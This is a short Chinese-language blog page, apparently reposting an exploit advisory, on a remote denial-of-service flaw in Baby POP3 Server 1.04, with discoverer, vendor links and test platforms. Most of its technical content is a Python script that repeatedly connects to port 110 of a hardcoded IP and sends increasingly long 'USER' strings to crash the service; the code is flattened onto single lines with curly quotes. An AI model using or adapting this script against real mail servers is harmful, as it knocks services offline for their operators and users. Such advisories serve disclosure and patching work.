Baby POP3 Server 1.04 拒绝服务漏洞技术分析

本文详细分析了Baby POP3 Server 1.04版本中存在的一个远程拒绝服务漏洞。攻击者通过Python脚本向目标服务器的110端口发送精心构造的超长USER命令数据包,可导致服务崩溃。文章包含完整的利用代码和测试环境信息。

漏洞标题:Baby POP3 Server 1.04 拒绝服务漏洞

发布日期:2025年8月28日

漏洞发现者:Érick Sousa (https://www.linkedin.com/in/erickssa)

厂商主页:https://www.pablosoftwaresolutions.com

软件链接:https://www.pablosoftwaresolutions.com/html/baby_pop3_server.html

受影响版本:Baby POP3 Server 版本 1.04

测试环境:Windows XP 和 Windows 7

Python 3.13.5 ;)

import socket

jkcode = b"A" counter = 0

while counter < 10000: counter += 10 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((“192.168.18.240”, 110)) s.send(b"USER " + jkcode * counter + b"\r\n") s.close()

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计